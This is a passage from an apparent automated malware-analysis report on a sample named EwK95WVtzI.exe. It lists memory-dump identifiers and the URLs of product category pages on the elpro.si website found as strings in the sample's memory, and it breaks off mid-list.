00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/vecih-plinov/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-30-eu/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-53-eu/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60584/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60751/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/ams-2750/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/cqi/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/din-en-301-489/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-12830/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-13060/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-285/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 